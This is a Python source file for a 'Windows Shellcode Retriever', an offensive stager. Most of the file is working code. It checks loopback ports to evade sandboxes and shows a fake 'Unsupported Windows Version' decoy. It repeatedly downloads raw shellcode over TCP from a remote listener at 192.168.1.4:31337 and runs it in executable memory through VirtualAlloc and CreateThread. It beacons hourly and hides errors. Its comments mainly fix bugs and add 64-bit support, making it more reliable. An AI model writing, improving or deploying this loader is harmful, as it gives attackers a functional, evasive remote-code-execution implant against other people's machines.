#!/usr/bin/env python
#
# Windows Shellcode Retriever
# By: HR
#
# It's just a slightly modified version of Joshua Pitts' Shellcode Retriever Script...
# Use Shellcode Sender on the other end to serve up your payloads for execution
#
import ctypes
import os
import re
import signal
import socket
import subprocess
import sys
import time
# --- Shellcode Sender endpoint --------------------------------------------
TARGET = '192.168.1.4'   # IP of the host running Shellcode Sender
PORT = 31337             # TCP port Shellcode Sender listens on

# --- Beaconing ------------------------------------------------------------
BEACON = True            # keep re-fetching the payload instead of running once
BEACON_DELAY = 3600      # seconds to wait between retrieval attempts (one hour)
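def system_info(source=None):
  """
     Run SYSTEMINFO and return a handful of its fields as a dict, e.g.

       {
         'Available Physical Memory': '644 MB',
         'Product ID': '00426-OEM-8992662-00006',
         'OS Name': 'Microsoft Windows 7 Ultimate',
         'BIOS Version': 'Phoenix Technologies LTD 6.00, 7/2/2012',
         'System Model': 'VMware Virtual Platform',
         'System type': 'X86-based PC',
         'Total Physical Memory': '1,023 MB',
         'Logon Server': '\\\\WIN-6CQ3JVLCHM4',
         'Domain': 'WORKGROUP',
         'Windows Directory': 'C:\\Windows',
         'OS Version': '6.1.7601 Service Pack 1 Build 7601',
         'System Manufacturer': 'VMware, Inc.',
         'Host Name': 'WIN-6CQ3JVLCHM4'
       }

     source: optional, already-captured SYSTEMINFO output to parse instead
       of running the command (useful for tests and for non-Windows hosts).
       When None the command is executed.

     Returns a dict with one entry per field name in sysOpts. A field that
     does not appear in the output maps to None (the original indexed [0]
     on an empty match list and raised IndexError). The labels are those of
     English Windows; a localised SYSTEMINFO prints different labels, so
     expect None values there.

     Example:
        >>> info = system_info()
        >>> info['OS Version']
        '6.1.7601 Service Pack 1 Build 7601'

     Parsing borrowed from our sacred stackoverflow:
        http://stackoverflow.com/questions/467602/how-can-i-read-system-information-in-python-on-windows
  """
  if source is None:
    # subprocess in list form (no shell) replaces the Python-2-only
    # os.popen2; universal_newlines gives text with \r\n folded to \n on
    # both Python 2 and 3.
    proc = subprocess.Popen(["SYSTEMINFO"], stdout=subprocess.PIPE,
                            universal_newlines=True)
    source = proc.communicate()[0]

  sysOpts = ["Host Name", "OS Name", "OS Version", "Product ID",
             "System Manufacturer", "System Model", "System type",
             "BIOS Version", "Domain", "Windows Directory",
             "Total Physical Memory", "Available Physical Memory",
             "Logon Server"]
  values = {}
  for opt in sysOpts:
    # Anchor at line start so e.g. "OS Name" cannot match inside another
    # line; \s* (the original had \w*, which never matches the padding
    # after the colon) absorbs the column alignment spaces.
    pattern = r"^\s*%s:\s*(.*?)\s*$" % re.escape(opt)
    match = re.search(pattern, source, re.IGNORECASE | re.MULTILINE)
    values[opt] = match.group(1) if match else None
  return values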
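def decoy_message():
  """
     Print a bogus "unsupported Windows version" notice and exit(0).

     Used when the sandbox heuristic fails or TARGET is unset, so whoever
     is watching sees a plausible compatibility error instead of a
     traceback. Never returns: always ends with sys.exit(0).
  """
  try:
    build = system_info()['OS Version']
  except Exception:
    # SYSTEMINFO missing or localised (or not Windows at all): the decoy
    # must still look like an ordinary error, not a stack trace.
    build = 'unknown'
  print("\n[x] Unsupported Windows Version!")
  print("   [*] Platform: %s" % sys.platform)
  print("   [x] Build Version: %s" % build)
  print("\n[*] Keep Checking Developer Site for updates...\n\n")
  sys.exit(0)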
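def _port_listening(port, timeout=2.0):
  """
     Return True if 127.0.0.1:port accepts a TCP connection, else False.

     A fresh socket is used for every probe: re-using one socket object
     after a failed connect() (as the original did for the second port) is
     not portable. The socket is always closed, and only socket.error is
     swallowed so a KeyboardInterrupt/SystemExit still propagates.
  """
  probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  probe.settimeout(timeout)
  try:
    probe.connect(('127.0.0.1', port))
    return True
  except socket.error:
    return False
  finally:
    probe.close()


def sandbox_check():
  """
     Cheap "is this a real Windows host?" heuristic for AV/sandbox evasion.

     A normal Windows box has SMB (445) and the RPC endpoint mapper (135)
     listening on loopback; many stripped-down analysis sandboxes do not.
     If neither port accepts a connection the decoy message is shown and
     the process exits (via decoy_message). The heuristic is weak - any
     sandbox running a full Windows image passes it - and the loopback
     connects themselves may be logged by host monitoring.
  """
  ##################################################################################
  # Add some mathematical stuff or some time consuming activities for added delays #
  ##################################################################################
  if not (_port_listening(445) or _port_listening(135)):
    # Mission Abort!
    decoy_message()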
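def run_shellcode(shellcode):
  """
     Copy shellcode into a fresh RWX region and run it on a new thread.

     ctypes VirtualAlloc, RtlMoveMemory, CreateThread, WaitForSingleObject
     From http://www.debasish.in/2012_04_01_archive.html

     shellcode: bytearray (or bytes, converted) holding raw machine code.

     Blocks until the shellcode thread returns. The region is allocated
     MEM_COMMIT|MEM_RESERVE with PAGE_EXECUTE_READWRITE and is never freed,
     matching the original; an RWX private allocation plus a raw
     CreateThread on it is a well-known detection signal.

     Raises ValueError for an empty buffer and OSError (ctypes.WinError)
     if VirtualAlloc or CreateThread fail - the original checked neither,
     so a NULL allocation would have been copied into and jumped to.
  """
  if not shellcode:
    raise ValueError("empty shellcode buffer")
  if not isinstance(shellcode, bytearray):
    # from_buffer() needs a writable buffer
    shellcode = bytearray(shellcode)
  size = len(shellcode)
  kernel32 = ctypes.windll.kernel32

  # Declare pointer-width types explicitly: the original wrapped every
  # argument and return value in c_int, which truncates 64-bit addresses
  # and handles on x64 Python builds.
  kernel32.VirtualAlloc.restype = ctypes.c_void_p
  kernel32.VirtualAlloc.argtypes = [ctypes.c_void_p, ctypes.c_size_t,
                                    ctypes.c_uint32, ctypes.c_uint32]
  kernel32.RtlMoveMemory.restype = None
  kernel32.RtlMoveMemory.argtypes = [ctypes.c_void_p, ctypes.c_void_p,
                                     ctypes.c_size_t]
  kernel32.CreateThread.restype = ctypes.c_void_p
  kernel32.CreateThread.argtypes = [ctypes.c_void_p, ctypes.c_size_t,
                                    ctypes.c_void_p, ctypes.c_void_p,
                                    ctypes.c_uint32,
                                    ctypes.POINTER(ctypes.c_uint32)]
  kernel32.WaitForSingleObject.restype = ctypes.c_uint32
  kernel32.WaitForSingleObject.argtypes = [ctypes.c_void_p, ctypes.c_uint32]
  kernel32.CloseHandle.restype = ctypes.c_int
  kernel32.CloseHandle.argtypes = [ctypes.c_void_p]

  MEM_COMMIT_RESERVE = 0x3000      # MEM_COMMIT | MEM_RESERVE
  PAGE_EXECUTE_READWRITE = 0x40
  INFINITE = 0xFFFFFFFF            # the original passed c_int(-1)

  # Get pointer to our allocated memory space
  region = kernel32.VirtualAlloc(None, size, MEM_COMMIT_RESERVE,
                                 PAGE_EXECUTE_READWRITE)
  if not region:
    raise ctypes.WinError()

  # Move shellcode into memory
  buf = (ctypes.c_char * size).from_buffer(shellcode)
  kernel32.RtlMoveMemory(region, buf, size)

  # Create new thread with the region as its start address
  thread_id = ctypes.c_uint32(0)
  thread_handle = kernel32.CreateThread(None, 0, region, None, 0,
                                        ctypes.byref(thread_id))
  if not thread_handle:
    raise ctypes.WinError()

  # Wait for the thread to finish; the handle was leaked in the original
  try:
    kernel32.WaitForSingleObject(thread_handle, INFINITE)
  finally:
    kernel32.CloseHandle(thread_handle)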
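def fetch_shellcode(target, port, timeout=30):
  """
     Pull a raw shellcode blob from target:port over plain TCP and run it.

     Everything the listener sends until it closes the connection is the
     payload: there is no length prefix, no authentication and no
     integrity check, so anyone who can reach or impersonate target:port
     controls what executes here. Kept as-is because that is Shellcode
     Sender's wire format.

     timeout: socket timeout in seconds for connect and each recv, so a
       hung listener cannot block the beacon loop forever (the original
       blocked indefinitely). The socket is always closed; the original
       never closed it.

     Raises socket.error/socket.timeout on connection problems (the caller
     swallows them). Does nothing if the listener sent zero bytes.
  """
  # Open TCP Socket Connection to target:port
  print('[*] Downloading Shellcode...')
  chunks = []
  conn = socket.create_connection((target, port), timeout)
  try:
    # Receive until the sender closes its side
    while True:
      data = conn.recv(4096)
      if not data:
        break
      chunks.append(data)
  finally:
    conn.close()

  # bytearray: run_shellcode needs a writable buffer for from_buffer()
  shellcode = bytearray(b''.join(chunks))
  if not shellcode:
    print('[x] Listener sent no payload')
    return

  # Pass to be run in memory...
  print('[*] Executing Shellcode in Memory....')
  run_shellcode(shellcode)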
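def main():
  """
     Entry point: sandbox heuristic, then fetch-and-run, beaconing if set.

     TARGET/PORT come from the module constants; an empty TARGET drops into
     the decoy (the source is meant to be edited before use). A failed
     retrieval is swallowed on purpose so nothing is shown to the user, but
     unlike the original it no longer ends the beacon loop: with BEACON set
     the next attempt happens after BEACON_DELAY seconds regardless.
     SystemExit raised by decoy_message() is not an Exception and still
     propagates.
  """
  # Does making connections raise alerts?
  sandbox_check()

  if TARGET == '':
    decoy_message() # If you cant read and edit source, you fail

  port = int(PORT)
  while True:
    try:
      fetch_shellcode(TARGET, port)
    except Exception:
      # Deliberate best-effort: no traceback, no message
      pass
    if BEACON is not True:
      break
    time.sleep(BEACON_DELAY)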
if __name__ == "__main__":
  # Only run when executed as a script, never on import
  main()